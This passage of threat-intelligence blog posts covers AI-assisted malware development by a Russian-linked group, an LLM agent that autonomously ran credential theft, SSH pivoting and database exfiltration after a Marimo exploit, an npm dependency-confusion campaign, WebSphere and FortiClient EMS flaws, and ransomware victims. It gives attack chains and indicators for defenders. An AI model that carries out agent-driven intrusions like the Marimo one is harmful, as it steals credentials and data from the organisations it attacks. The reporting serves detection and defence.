Zoom or LAPAS. Users are tricked into executing commands that start a PhantomRelay infection. PrincessClub: Fake Ukrainian adult-club websites deliver malware. On Android, it deploys FallSpy, an Android spyware for sensitive data harvesting. On Windows, it delivers PhantomRelayV1 or LegionRelay, a lightweight PowerShell-based RAT capable of file enumeration, exfiltration, screenshot capture, browser data theft, and Telegram and WhatsApp data exfiltration. Later versions included WebRTC-based live call features to capture audio and video. DroneLink: Websites impersonating charitable foundations supporting the Armed Forces of Ukraine distribute WireGuard and LegionRelay. Nebo: A FallSpy sample mimicking a Russian-language login screen attempts to deceive Ukrainian military personnel into compromising their devices. The group uses AI platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini for image generation, malware development (e.g., LegionRelay), obfuscation, loader scripts, backend infrastructure, and post-compromise commands. This AI integration helps GREYVIBE overcome technical expertise gaps, speed up development, and reduce reliance on known tools that could help with attribution. This shows a trend among threat actors, including those like APT28, who also use AI in their campaigns, as detailed in our analysis of APT28's LLM-powered phishing and custom malware. Despite its nation-state affiliations, GREYVIBE has ties to the broader Russian cybercrime ecosystem. Some members may be current or former cybercriminal actors. Evidence includes possible access to an ISO builder linked to the TrickBot gang and UAC-0098, the presence of PhantomRelay variants in unrelated cybercrime activities (such as Microsoft Teams voice phishing campaigns and KongTuke delivery chains), early development samples uploaded to VirusTotal, the use of internet slang in development artifacts, and the deployment of the XMRig miner on some infected machines. This group operates in a complex area between cybercrime and state-affiliated operations, making traditional attribution difficult. For more on the activities of Russian-linked APTs and new malware campaigns, further research provides context. The group's activities show an increasing trend of state-affiliated actors mixing with cybercriminal elements and using advanced AI for offensive purposes. How an LLM agent conducted post-exploitation after a Marimo RCE An unknown threat actor recently used a large language model (LLM) agent to automate sophisticated post-compromise actions. This development was observed after the exploitation of a publicly-accessible Marimo network via CVE-2026-39987. This critical pre-authenticated remote code execution (RCE) vulnerability affects all Marimo versions up to and including 0.20.4, allowing an unauthenticated attacker to execute arbitrary system commands. The flaw has been addressed in version 0.23.0. Sysdig documented this incident on May 10, 2026. The attack chain lasted just over an hour. The attacker first compromised a vulnerable Marimo notebook, then quickly moved through several stages: Credential Extraction: Two cloud credentials were taken from the compromised host. Key Retrieval: These credentials were used through a fanned-out egress pool to get an SSH private key from AWS Secrets Manager. SSH Pivoting: The retrieved SSH key was used for eight short, parallel SSH sessions against a downstream SSH bastion server. Data Exfiltration: During the bastion phase, the threat actor exfiltrated the schema and entire contents of an internal PostgreSQL database in under two minutes. Sysdig identified four key indicators that an LLM agent was driving the post-exploitation activity: Schema Agnosticism: The attacker improvised a database dump without prior knowledge of the PostgreSQL schema. The agent adapted to the database structure to find and exfiltrate sensitive data. Planning Comment Leak: A Chinese-language planning comment, "看还能做什么" (translating to "See what else we can do"), was leaked into the command stream during a credential search, indicating an automated planning process. Machine-Consumable Commands: Every command executed was designed for machine consumption, featuring "---" delimiters for separation, bounded output captures, disabled "less" command usage, and discarded error streams (stderr) to minimize noise for an automated parser. Value Handoffs: Critical values, such as database passwords, were extracted and immediately fed as input into subsequent actions. This shows the agent's ability to chain commands dynamically based on previous outputs (e.g., cat ~/.pgpass followed by commands using the extracted password, or ls confirming an SSH key's presence before cat to print its contents). This incident shows a shift from scripted attacks to adaptive, agent-driven operations where the "bar becomes inference budget, not playbook authorship." While a human operator might abort or use hard-coded options when facing an unexpected environment, an AI agent can interpret the surprise, decide what to try next, and continue the attack. This incident is a documented example of an AI agent adaptively driving an entire post-exploitation sequence, showing a change in automated offensive capabilities. The recent npm dependency confusion attack against corporate networks A single threat actor, using the maintainer accounts mr.4nd3r50n, ce-rwb, and t-in-one, launched a large npm dependency confusion attack on May 28 and May 29, 2026. This sophisticated campaign targeted "prominent corporate environments" by impersonating internal corporate packages across nine different organizational scopes. Microsoft Threat Intelligence researchers identified dozens of rogue packages published during two concentrated bursts, designed to infiltrate modern software developer pipelines. The attacker registered multiple scopes that exactly mirrored real internal corporate namespaces, including cloudplatform-single-spa, payments-widget, and sber-ecom-core. To ensure the malicious code took precedence during dependency resolution, the actor used inflated version numbers, often 100.100.100. This technique exploits the common development practice where package managers prioritize higher version numbers, tricking developer systems into installing the malicious lookalike instead of the authentic internal asset. The infection chain activates automatically by abusing lifecycle hooks. The malicious packages declare an automatic install-time script hook, primarily using the postinstall parameter, which immediately executes a hidden script named postinstall.js upon standard installation. This stager, about seven kilobytes of heavily obfuscated JavaScript, uses complex obfuscator.io-style formatting, including string array encoding and control flow flattening, to avoid detection and manual analysis. It also includes self-defending routines to prevent modification or analysis. Before downloading its final spy payload, the deobfuscated stager processes an intricate eight-stage validation routine: CI Environment Check: Detects continuous integration environments to avoid monitored developer pipelines, quietly stopping if a testing environment is found. Node.js Version Check: Checks the active Node.js layout version for compatibility. Cache Deduplication: Creates a unique local folder path to log prior installations, exiting if a valid cache entry exists to prevent repeated network connections. If these checks pass, an HTTPS GET request retrieves the primary payload binary from a remote server. The payload operates silently in a "reconnaissance-only" mode by default, collecting system information, hostnames, environment variables, and developer context. The threat actor can remotely toggle an environment variable named RECON_ONLY to switch to full exploitation capabilities, enabling credential theft, data exfiltration, or secondary backdoor deployment. Forensic metadata analysis linked the three maintainer accounts to a single operator through a shared hardcoded authentication value, l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1. This value was consistently sent as an X-Secret HTTP header on every outbound C2 request from all packages across the three accounts. Historical registry data also indicates the actor transitioned from a legitimate bug bounty researcher in April 2024 to deploying active malware two years later. The C2 domain used for payload retrieval is oob.moika.tech. This campaign shows that supply chain attacks targeting developer pipelines through dependency confusion remain effective. Technical Takeaways CVE-2026-0257 in Palo Alto Networks PAN-OS GlobalProtect is under active exploitation, allowing unauthorized VPN connections and internal network access. The GREYVIBE group, a newly identified Russian-linked threat actor, uses generative AI and large language models in its multi-vector cyber espionage campaigns targeting Ukrainian entities. An LLM agent orchestrated post-exploitation activities, including credential theft from AWS Secrets Manager and PostgreSQL database exfiltration, after exploiting Marimo CVE-2026-39987. A recent npm dependency confusion attack infiltrated "prominent corporate environments" by spoofing package names and using the postinstall lifecycle hook to deliver reconnaissance payloads. Threat actors are increasingly integrating AI into malware development and post-exploitation activities. This challenges traditional detection methods and speeds up offensive capabilities. --- ## IBM WebSphere CVE-2026-8633 RCE (CVSS 9.8) - URL: https://purple-ops.io/blog/ibm-websphere-cve-2026-8633-rce - Date: 2026-05-30 - Category: CVE Analysis - Tags: ibm, websphere, cve-2026-8633, rce, application-server - Reading time: 5 min | CVSS: 9.8 **Summary:** IBM WebSphere CVE-2026-8633 is a critical RCE vulnerability (CVSS 9.8) affecting WebSphere Application Server using web server plug-ins. IBM WebSphere CVE-2026-8633 RCE (CVSS 9.8) IBM has issued an urgent security bulletin about a critical remote code execution (RCE) vulnerability, CVE-2026-8633, in its WebSphere Application Server software. This vulnerability impacts installations using optional web server plug-ins. It has a CVSS base score of 9.8, which classifies it as critical severity. Administrators must act promptly to address this security flaw. The vulnerability allows an unauthenticated attacker to execute arbitrary commands on the host environment via a specially crafted request. This severely risks the confidentiality, integrity, and availability of systems running affected WebSphere Application Server instances. A secondary vulnerability, CVE-2026-8620, related to HTTP request smuggling, was also addressed alongside the primary RCE flaw. Administrators should prepare for immediate deployment of the latest software to mitigate these threats. IBM developed a permanent fix, APAR PH71342. This fix will be delivered through upcoming Fix Packs for affected WebSphere Application Server traditional and WebSphere Application Server Liberty versions. What is CVE-2026-8633 and why is it critical? CVE-2026-8633 is a critical remote code execution vulnerability affecting IBM WebSphere Application Server with a CVSS base score of 9.8. This high severity score reflects the potential for an unauthenticated attacker to execute arbitrary commands on the underlying host environment without requiring prior authentication. The flaw specifically resides within the Web Server Plug-ins component of WebSphere Application Server when they are in use. CVE-2026-8633 is critical for several reasons. First, arbitrary code execution grants attackers extensive control over a compromised system. This can lead to complete system compromise, data exfiltration, service disruption, or persistent access within an organization's network. Second, the attack is unauthenticated. Adversaries do not need valid credentials or to bypass existing authentication to exploit it. This lowers the barrier for attackers, making it a more accessible target for various threat actors. Third, the target is WebSphere Application Server, a core component in many enterprise infrastructures. It frequently handles sensitive data and business-critical applications. Compromising such a central component can have widespread, severe implications across an organization. The vulnerability's presence in Web Server Plug-ins indicates an issue in how these components process specially crafted requests. These plug-ins act as intermediaries between a web server (like Apache HTTP Server or IBM HTTP Server) and the WebSphere Application Server instance, directing requests to the correct application server. A flaw at this layer can allow malicious input to bypass security controls and reach the underlying application server or its host operating system in a way that facilitates code execution. The urgency of this vulnerability shows the immediate threat it poses to any organization running affected WebSphere Application Server versions with the optional web server plug-ins deployed. Impact An attacker exploiting CVE-2026-8633 can achieve full remote code execution on the host where IBM WebSphere Application Server runs. This allows them to run arbitrary commands, gaining control over the server. Such a compromise has extensive implications, affecting the system's confidentiality, integrity, and availability, and potentially other interconnected resources. The CVSS score of 9.8 rates the vulnerability as critical, its highest level of severity. Organizations using the optional web server plug-ins with WebSphere Application Server are at risk. These plug-ins are common in enterprise deployments for load balancing, routing, and other functions, expanding the attack surface. An unauthenticated attacker can use this flaw to: Execute System Commands: Run operating system commands with the privileges of the WebSphere Application Server process, potentially escalating privileges to gain root or administrator access. Deploy Malicious Payloads: Install malware, backdoors, or other malicious software on the server for persistent access or to establish a foothold for lateral movement within the network. Exfiltrate Sensitive Data: Access and steal confidential data processed or stored on the server, including customer information, intellectual property, and system configurations. Disrupt Services: Cause denial-of-service conditions by tampering with server configurations, deleting critical files, or overloading system resources. Establish Persistent Access: Create new user accounts, modify existing ones, or install web shells to maintain access even after initial exploitation. This vulnerability affects enterprise web applications and middleware solutions globally. IBM WebSphere Application Server is a foundational technology for many large organizations. Compromising these critical backend systems can lead to operational disruptions, financial losses, and reputational damage. This situation resembles other critical unauthenticated RCE vulnerabilities that have threatened enterprise infrastructure, as discussed in our prior analysis of CVE-2026-45695 RCE. Exploitation Chain Attackers exploit CVE-2026-8633 through specially crafted HTTP requests targeting the Web Server Plug-ins component of IBM WebSphere Application Server. An unauthenticated attacker can access the vulnerability; no prior credentials or session tokens are required to initiate the attack. This broadens the scope of adversaries, as anyone with network access to the vulnerable plug-in can attempt exploitation. Successful exploitation requires deploying the optional Web Server Plug-ins with WebSphere Application Server. These plug-ins usually integrate with external web servers like IBM HTTP Server, Apache HTTP Server, or Microsoft IIS, acting as a proxy or redirector for requests to WebSphere Application Server. When a specially crafted request is sent to the web server and forwarded to the plug-in, a vulnerability in the plug-in's parsing or handling logic allows arbitrary code injection and execution on the underlying WebSphere Application Server host. The public advisory does not detail the "specially crafted request." However, such vulnerabilities often involve malformed headers, unexpected parameters, or payload injection to bypass input validation. This unauthenticated RCE capability poses a critical threat, requiring prompt patching. Our research team previously covered a related vulnerability in this product; details on an IBM WebSphere RCE flaw are here. Also, a secondary vulnerability, CVE-2026-8620, introduces HTTP request smuggling opportunities. HTTP request smuggling exploits discrepancies in how two HTTP devices (e.g., a frontend proxy and a backend server) interpret HTTP request boundaries. This can lead to an attacker "smuggling" an additional request within a legitimate one, or causing the backend server to process part of the attacker's request as the start of a subsequent request. Successful HTTP request smuggling can have consequences such as: Bypassing security controls: Attackers can bypass web application firewalls (WAFs) or intrusion prevention systems (IPS) by concealing malicious payloads within legitimate traffic. Unauthorized access: Gaining access to sensitive endpoints or internal services that would otherwise be protected. Cache poisoning: Manipulating web caches to serve malicious content to other users. Cross-site scripting (XSS) or other injection attacks: Delivering payloads to other users through manipulated backend responses. Chaining with other vulnerabilities: Request smuggling can facilitate other attacks, potentially leading to further compromise. The advisory does not explicitly mention public Proof-of-Concept (PoC) exploits or confirmed in-the-wild exploitation for either CVE-2026-8633 or CVE-2026-8620 at publication. However, the "urgent security bulletin" designation and high CVSS score indicate a critical risk demanding immediate attention, regardless of public PoC availability. The potential for unauthenticated RCE makes these vulnerabilities attractive targets for adversaries. Which IBM WebSphere versions are affected by CVE-2026-8633? The IBM WebSphere Application Server versions affected by CVE-2026-8633 and CVE-2026-8620 include both traditional and Liberty profiles. Specific product lines and version ranges requiring immediate attention are: IBM WebSphere Application Server traditional: Version 8.5 (all fix packs). Version 9.0 (all fix packs). IBM WebSphere Application Server Liberty: Version 8.5 (all fix packs). Version 9.0 (all fix packs). Note that the vulnerability impacts "installations that utilize optional web server plug-ins." While the core WebSphere Application Server product is identified, the specific configuration involving these plug-ins is a prerequisite for CVE-2026-8633 exploitation. Organizations using these versions should check if their deployments include the optional web server plug-ins. Both traditional and Liberty versions are affected, demonstrating the flaw's pervasive nature across different deployment models of the WebSphere Application Server platform. WebSphere Application Server traditional is the long-standing, full-profile version, known for its complete feature set for large, complex enterprise deployments. WebSphere Application Server Liberty is a lightweight, dynamic, modular application server for cloud-native applications, microservices, and development environments, offering a smaller footprint and faster startup times. That both major deployment profiles are affected shows the vulnerability's fundamental nature. Detection Detecting exploitation attempts for CVE-2026-8633 and CVE-2026-8620 requires a full security monitoring strategy, especially without specific vendor-provided Indicators of Compromise (IOCs) or signature-based detection methods in the immediate public advisory. Since CVE-2026-8633 involves specially crafted requests to Web Server Plug-ins leading to remote code execution, monitoring network traffic and server logs for anomalous patterns is essential. Focus detection efforts on these key areas: Network Intrusion Detection/Prevention Systems (NIDS/NIPS): While no specific signatures are available at this time, NIDS/NIPS should flag unusual HTTP request patterns targeting WebSphere Application Server endpoints, especially those handled by web server plug-ins. Look for: Unexpected HTTP methods or headers. Unusually long or malformed URL paths and parameters. Rapid successive requests from a single source IP address targeting varied paths, potentially indicating probing or scanning activity. Requests containing shell commands or suspicious code snippets within HTTP headers or body, particularly if URL-encoded or obfuscated. Web Server and Application Server Logs: Review access logs from the web server (e.g., IBM HTTP Server, Apache HTTP Server) and the WebSphere Application Server for anomalies. Web Server Logs: Monitor for unusual HTTP status codes (e.g., 500-level errors following malformed requests) or requests to unusual resource paths. WebSphere Application Server Logs: Look for error messages, security exceptions, or logs indicating unexpected process execution, particularly if originating from unauthenticated sessions. Activity associated with newly created processes or execution of shell commands within the WebSphere Application Server process space highly indicates compromise. Endpoint Detection and Response (EDR) Systems: EDR solutions deployed on the WebSphere Application Server host are valuable for identifying post-exploitation activities. Monitor for unusual child processes spawned by the WebSphere Application Server process (e.g., cmd.exe, powershell.exe, bash, sh), and detect unexpected file writes, modifications to system configuration files, or creation of new executable files in unusual directories. Alert on outbound network connections initiated by the WebSphere Application Server process to suspicious external IP addresses or domains. Security Information and Event Management (SIEM) Systems: Aggregate logs from NIDS/NIPS, web servers, application servers, and EDR systems into a SIEM for centralized analysis and correlation. Develop correlation rules to detect sequences of suspicious events that could indicate an exploitation attempt followed by post-exploitation activity. For CVE-2026-8620 (HTTP request smuggling), detection is more complex. Monitoring for discrepancies in how different components interpret request lengths (e.g., Content-Length vs. Transfer-Encoding headers) can be challenging but critical. Look for: Frontend server logs showing different request sizes or truncated requests compared to backend server logs for the same transaction. Unexpected responses or errors from backend servers that do not correspond to the apparent request sent to the frontend. These critical vulnerabilities require ongoing proactive monitoring and establishing a baseline of normal server behavior to identify and respond to potential exploitation attempts effectively. Remediation Remediation for CVE-2026-8633 and CVE-2026-8620 involves applying official IBM patches. IBM developed a permanent fix, APAR PH71342, to address the underlying architectural flaws. This fix will integrate into upcoming Fix Packs for the affected WebSphere Application Server versions. The following steps outline the recommended remediation process: Patch Application: Monitor the official IBM support portal and security bulletins for the release of Fix Packs that include APAR PH71342. Once available, download and apply the relevant Fix Packs for all affected IBM WebSphere Application Server traditional and WebSphere Application Server Liberty installations. Ensure that both Version 8.5 and Version 9.0 instances are updated to the latest secure levels. Applying these Fix Packs is the most effective and recommended mitigation. Adhere strictly to IBM's official patching instructions for proper installation and to avoid operational downtime. Testing Updates: Prior to deploying patches in production, rigorously test the updates on non-production systems that mirror your production setup. This practice helps to identify and mitigate potential compatibility issues or regressions that could arise from the patch application. Verify that critical applications and functions continue to operate as expected post-patch. Mitigation for HTTP Request Smuggling (CVE-2026-8620): In conjunction with the Fix Packs addressing CVE-2026-8633, the vendor's official request smuggling patch should be implemented. While this is likely included in the Fix Packs, administrators should confirm its application. Review and configure intermediate network devices such as load balancers, proxies, and web application firewalls to strictly enforce HTTP protocol parsing. Ensuring consistent interpretation of HTTP request boundaries across all network components can help mitigate request smuggling attacks. System Hardening and Monitoring: After patching, conduct a thorough review of system configurations for security best practices. Implement strong monitoring solutions to detect any unusual activity that might indicate lingering vulnerabilities or new threats, such as unexpected errors, unauthorized access attempts, or unusual process executions. Regularly update all IT infrastructure components, not just WebSphere, to reduce the overall attack surface. This includes operating systems, underlying web servers, and other middleware. For instance, addressing vulnerabilities in other critical IBM products is also important, as shown in our analysis of IBM ELM Jazz CVE-2026-3660. Proactively applying these security fixes is crucial to securing corporate networks and ensuring the long-term integrity of enterprise web applications against these critical vulnerabilities. Technical Takeaways CVE-2026-8633 is an unauthenticated remote code execution vulnerability in IBM WebSphere Application Server with a CVSS score of 9.8. The vulnerability affects WebSphere Application Server traditional and WebSphere Application Server Liberty versions 8.5 and 9.0 when optional web server plug-ins are utilized. Exploitation involves a specially crafted request to the Web Server Plug-ins, allowing an attacker to execute arbitrary commands on the host environment. A related vulnerability, CVE-2026-8620, addresses HTTP request smuggling opportunities, which can be chained with other attacks. Remediation requires applying upcoming Fix Packs containing APAR PH71342 for both vulnerabilities, emphasizing urgent deployment after thorough testing. --- ## 25 New Ransomware Victims as Com Ecosystem Expands - URL: https://purple-ops.io/blog/ransomware-victims-com-ecosystem - Date: 2026-05-29 - Category: Ransomware Report - Tags: ransomware-victims, the-gentelman, com-ecosystem, extortion, ransomware-trends - Reading time: 5 min **Summary:** 25 new ransomware victims were reported as The Com ecosystem emerges, expanding the overall ransomware and extortion threat landscape. 25 New Ransomware Victims as Com Ecosystem Expands Statistical Overview Victim Totals This month: 744 This quarter: 1522 Year to date: 4147 Last 24h: 25 Quarterly Breakdown Q1: 2631 | Q2: 1522 | Q3: 0 | Q4: 0 Ransomware activity maintains a consistent pace and contributes to the overall victim count this quarter, with many new compromises reported. Introduction The past period saw 25 new ransomware victims, showing persistent activity across diverse sectors and geographies. The_Gentelman emerged as the most active group, accounting for four of these incidents. Primary target sectors included Legal Services and Healthcare, while the United States remained the most frequently impacted country. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1The Gentelman4Corporacion prokompra, Fonderia corra, Grupo premier (+1)Italy, MexicoAgriculture & Food, Manufacturing 2Akira2Interstate roofing, Schacht law officeUnited StatesConstruction & Engineering, Legal 3CMD2Capital Family Physicians, Heart of America Eye CareUnited StatesHealthcare 4Chaos2Entransinternational.com, Powerhousenow.comUnited StatesManufacturing, Professional Services 5Everest2Asopagos s.a., ЕрмUnited Kingdom, ColombiaGovernment / Public Sector, Professional Services 60day-syndicate1Braincell braincell.sa rfcargo.braincell.solutions rf.braincell.solutions governata.comSaudi ArabiaTechnology / Software 7AiLock1Restorative therapies, inc.United StatesManufacturing 8Genesis1Peña & brombergUnited StatesLegal 9Gunra1SomafixFranceRetail & Ecommerce 10INC Ransom1belimed.comSwitzerlandHealthcare 11Lamashtu1Shanpoornammetals.comMalaysiaEnergy & Utilities 12LeakedData1Fox rothschild llpUnited StatesLegal The_Gentelman was the most prolific group, claiming four victims across manufacturing and agriculture. Groups such as Akira, Chaos, CMD, and Everest each reported two new compromises. These targeted a mix of professional services, construction, healthcare, and government entities. CMD ransomware continued its targeting of the healthcare sector. Everest's compromise of Asopagos s.a. in Colombia indicates ongoing risk to the Government/Public Sector. Victim Distribution By Country United States: 14 Venezuela: 1 Colombia: 1 United Kingdom: 1 Switzerland: 1 Sri Lanka: 1 Saudi Arabia: 1 Mexico: 1 Malaysia: 1 Italy: 1 By Industry Legal Services: 3 Healthcare: 2 Retail: 2 Business Services & Supplies: 1 Wholesale Greenhouse: 1 Transportation Equipment Manufacturing: 1 Precious Metals Refining: 1 Medical Equipment Manufacturing: 1 Facilities Services: 1 Education: 1 The United States remains the primary target country for ransomware, representing over half of the reported victims. Targeting is diverse, but Legal Services and Healthcare sectors show a significant concentration, demonstrating persistent threats to professional and essential services. Ransomware News Topline The period shows complex criminal ecosystems are emerging alongside persistent ransomware and extortion campaigns, influencing cyber insurance market dynamics. Campaigns & Operations Flashpoint's analysis details "The Com," a diffuse neo-Nazi criminal ecosystem. Its "Hacker Com" wing is involved in breaches, DDoS attacks, and ransomware activity, recruits from gaming communities, and targets cloud and SaaS platforms. Separately, Qilin ransomware confirmed a cyber incident at Kennedy McLaughlin & Associates, an accounting firm, and DragonForce allegedly breached QLS Group, a Victorian retail logistics firm. ShinyHunters conducted a voice-phishing attack against Charter Communications, compromising an employee's Microsoft Entra identity and accessing a Salesforce instance, affecting 4.9 million accounts. A ransomware-style cyberattack also impacted Portraitbox GmbH, a German IT service provider for school photographers. Vulnerabilities & TTPs Threat actors are using sophisticated social engineering tactics, such as the voice-phishing attack ShinyHunters used to gain initial access via a compromised Microsoft Entra identity for Salesforce. The Com ecosystem targets critical cloud and SaaS platforms, including Okta, Salesforce, and Microsoft 365, showing a focus on widely adopted enterprise solutions. Analyst Note These incidents show threat actors are becoming more sophisticated, and strong defense is needed against social engineering and supply chain compromises. Technical Takeaways The_Gentelman is the most active group, claiming four new victims across manufacturing and agriculture. The United States is the primary target country, accounting for 14 of the 25 reported ransomware victims. Legal Services and Healthcare are consistently targeted by various ransomware groups, along with Manufacturing. Extortion campaigns continue to use social engineering techniques, specifically voice-phishing, to compromise cloud and SaaS platforms. New threat ecosystems, such as "The Com," are emerging, integrating ransomware with broader criminal activities like child exploitation and physical intimidation. --- ## FortiClient EMS CVE-2026-35616 (CVSS 9.1) Exploited - URL: https://purple-ops.io/blog/forticlient-ems-cve-2026-35616-exploit - Date: 2026-05-29 - Category: CVE Analysis - Tags: forticlient-ems, cve-2026-35616, credential-theft, exploitation, pre-authentication - Reading time: 5 min | CVSS: 9.1 **Summary:** FortiClient EMS CVE-2026-35616, a critical (CVSS 9.1) pre-authentication flaw, is actively exploited to steal credentials. FortiClient EMS CVE-2026-35616 (CVSS 9.1) Exploited Fortinet FortiClient Endpoint Management Server (EMS) is affected by CVE-2026-35616, a critical pre-authentication API access bypass vulnerability leading to privilege escalation, carrying a CVSS score of 9.1. This vulnerability allows unauthorized attackers to gain elevated privileges on the EMS server without prior authentication. The flaw enables threat actors to manipulate critical management functions within the FortiClient EMS environment. Recent intelligence indicates this vulnerability is actively exploited. Attackers use CVE-2026-35616 to deploy credential-stealing malware across managed endpoints. Attacks observed in May 2026 show attackers abusing the trusted endpoint management infrastructure to deliver malicious payloads disguised as legitimate Fortinet updates. The primary objective of these campaigns is information theft, specifically targeting sensitive user data such as browser-saved credentials, session cookies, and autofill information. Exploiting this vulnerability bypasses initial authentication, giving attackers control over the FortiClient EMS server and, subsequently, its managed endpoints. Impact Exploiting CVE-2026-35616 gives an attacker complete control over FortiClient EMS and its managed endpoints, which leads directly to data exfiltration. Successful exploitation of this pre-authentication API access bypass (CVSS score: 9.1) allows attackers to modify EMS management configurations in a privileged context. This capability is then used to push malicious scripts for execution across all managed endpoints connected to the compromised EMS server. The core malicious payload observed is a previously unreported Windows information stealer, identified as FortiEndpoint_Patch.exe, which masquerades as a Fortinet update. This information stealer harvests sensitive data from Chromium- and Gecko-based web browsers. Data targeted includes user passwords, session cookies, and autofill details such as credit card information, physical addresses, and phone numbers. The exfiltration of session cookies is a significant risk, as these can provide attackers with follow-on access to many cloud services, internal applications, and other authenticated resources. When session reuse is possible, these stolen session cookies may allow attackers to circumvent multi-factor authentication (MFA) prompts, giving them unauthorized, persistent access without needing actual credentials. Because attackers abuse the FortiClient EMS's trust and management pathways, every endpoint managed by the compromised server becomes a potential execution target for the malicious payload. This removes the need for separate intrusion paths for each device, greatly expanding attack reach and efficiency. The compromised environment effectively turns the organization's own endpoint management solution into a distribution mechanism for malware, making it challenging for security teams to differentiate between legitimate and malicious operations. This broad compromise risk shows the importance of addressing CVE-2026-35616 immediately. Exploitation Chain CVE-2026-35616 exploitation begins with a critical pre-authentication API access bypass vulnerability that gives attackers privilege escalation on the FortiClient EMS server. This allows attackers to interact with EMS functionality in a privileged context without needing to authenticate first. This initial access allows manipulation of EMS's configuration and distribution of malicious payloads to managed endpoints. Our prior analysis of Fortinet authentication bypass flaws details how such vulnerabilities can provide initial access and control. After compromising the FortiClient EMS server, attackers take these steps to prepare for malware delivery and maintain covert operations: Configuration Modification: Attackers modify EMS configurations. This includes deferring firmware upgrade reminders, likely to prevent legitimate updates from interfering or raising suspicion. Remote Access Profile Manipulation: A Remote Access Profile configuration is altered. This modification is critical, as it inserts a malicious script for execution on endpoint devices, using EMS's legitimate management pathway to push attacker-controlled code. Endpoint Policy Injection: Attackers further modify an endpoint policy to embed the malicious script, ensuring its widespread distribution and execution across all managed endpoints. This step effectively uses the trusted EMS system to propagate the threat, making it appear as a standard management task. Malware execution on endpoints then follows a specific, multi-stage process: Legitimate Executable Abuse: The attack uses fortitray.exe, a FortiClient executable, to launch a .cmd script file. This technique blends malicious activity with normal system processes, making detection more challenging. PowerShell Invocation: The .cmd script invokes a Base64-encoded PowerShell script. Base64 encoding obfuscates malicious commands and evades simple signature-based detection. Payload Delivery: The PowerShell script downloads the primary malicious payload. This payload, named FortiEndpoint_Patch.exe, is disguised as a Fortinet endpoint update, exploiting user trust in official patches. Malware Execution and Data Harvesting: FortiEndpoint_Patch.exe executes as a Windows information stealer. This malware does not have its own network-based exfiltration capabilities. Instead, it harvests sensitive data like passwords, cookies, and autofill details from Chromium- and Gecko-based browsers. The collected data is written to a log file in the ProgramData directory on the compromised endpoint. Data Exfiltration: The same PowerShell script that delivered the payload then transmits the captured data. It exfiltrates the log file's contents to an attacker-controlled infrastructure via an HTTP POST request. The observed attacker C2 server is 83.138.53[.]110. This execution pattern shows a sophisticated understanding of FortiClient EMS's operational mechanisms, allowing attackers to push malicious PowerShell commands that closely mimic legitimate management operations. This increases the attack's stealth and its ability to propagate across an organization's network. For more details on this vulnerability and its impact on Fortinet EMS, refer to our full analysis on CVE-2026-35616 and Fortinet EMS. Affected products and versions The vulnerability CVE-2026-35616 impacts specific versions of Fortinet FortiClient Endpoint Management Server (EMS). FortiClient Endpoint Management Server (EMS): All versions prior to 7.4.7. Organizations running FortiClient EMS versions earlier than 7.4.7 should consider their installations vulnerable and potentially compromised, given the active exploitation. Detection Detecting exploitation of CVE-2026-35616 requires a multi-layered approach focusing on network, endpoint, and server-side indicators. Since the attack uses legitimate management pathways, anomalies in system behavior and process execution are crucial indicators. Network Indicators: Outbound Connections to C2: Monitor all outbound network traffic from FortiClient EMS servers and managed endpoints for connections to 83.138.53[.]110. Specifically, look for HTTP POST requests from these devices, which indicate data exfiltration. Unusual EMS Traffic Patterns: Establish a baseline for normal FortiClient EMS network communication. Deviations like unexpected spikes in outbound data or connections to unusual external IP addresses require investigation. Encrypted Traffic Anomalies: While the observed exfiltration uses HTTP POST, attackers may pivot to encrypted channels. Monitor for unusual SSL/TLS certificate usage or connections to newly observed domains from EMS and managed endpoints. Endpoint Indicators (EDR/SIEM Queries): Process Creation Chains: Look for fortitray.exe (a FortiClient component) spawning cmd.exe. Then, investigate cmd.exe launching powershell.exe, especially with Base64-encoded arguments. Sample EDR query (pseudo-code): Process.parent.name == "fortitray.exe" AND Process.name == "cmd.exe" followed by Process.parent.name == "cmd.exe" AND Process.name == "powershell.exe" AND Process.command_line CONTAINS "EncodedCommand" Malicious Payload Presence: Search for files named FortiEndpoint_Patch.exe or similar suspicious executables in unexpected directories, especially in user profiles or the ProgramData directory. Monitor for the creation of new executable files that mimic legitimate Fortinet update names. PowerShell Script Execution: Detect PowerShell execution with EncodedCommand parameters. Decode and analyze commands for suspicious activities like downloading files from external URLs, modifying system configurations, or initiating network connections. Look for PowerShell scripts creating log files in the ProgramData directory, particularly those containing sensitive data patterns (e.g., "password", "cookie"). File System Changes: Monitor for creation or modification of files within the ProgramData directory that appear to be temporary log files, especially those containing harvested credentials or browser data. Look for suspicious .cmd script creations or modifications, particularly in directories associated with FortiClient or system startup. Registry and Configuration Changes: Monitor for modifications to FortiClient EMS configurations related to firmware upgrade reminders, Remote Access Profiles, or endpoint policies. These changes indicate post-exploitation activity on the EMS server. Detect unusual changes to FortiClient agent settings on managed endpoints that might allow for silent script execution or data collection. Server-Side (FortiClient EMS) Indicators: API Access Anomalies: Review FortiClient EMS server logs for unauthorized or unexpected API access attempts, especially those without prior authentication. Look for successful API calls from untrusted sources that modify configuration settings related to endpoint policies or remote access profiles. Administrative Account Usage: Monitor for unusual activity by administrative accounts on the EMS server, especially if it coincides with configuration changes that enable script injection. Log Integrity: Verify FortiClient EMS log integrity to ensure they have not been tampered with or cleared by an attacker. Organizations should integrate threat intelligence on known malware artifacts and C2 infrastructure into their detection systems to increase the likelihood of identifying these attacks. Remediation Because CVE-2026-35616 is actively exploited, immediate and complete remediation steps are critical to mitigate risk and restore environment integrity. Patching: The most urgent remediation is to upgrade all FortiClient Endpoint Management Server (EMS) installations to version 7.4.7 or later. Fortinet released patches for this pre-authentication API access bypass vulnerability. This update resolves the root cause of unauthorized access and privilege escalation. Compromise Assessment: Because CVE-2026-35616 is actively exploited, a thorough compromise assessment is mandatory for all environments running FortiClient EMS versions prior to 7.4.7. This assessment should include: Review FortiClient EMS server logs for unauthorized configuration changes, API access anomalies, and unusual administrative activity. Scan all managed endpoints for FortiEndpoint_Patch.exe (or similar suspicious executables) and related malicious files in the ProgramData directory. Analyze endpoint logs for the process execution chain involving fortitray.exe spawning cmd.exe and then Base64-encoded powershell.exe commands. Inspect network traffic logs for connections to the identified attacker C2 83.138.53[.]110 or other suspicious external IPs. Credential Rotation: If a compromise is suspected or confirmed, or if EMS was unpatched for an extended period, mandate a password reset for all users. Prioritize users with access to critical cloud services, internal applications, and sensitive authenticated resources, as their browser-saved credentials and session cookies may have been exfiltrated. MFA and 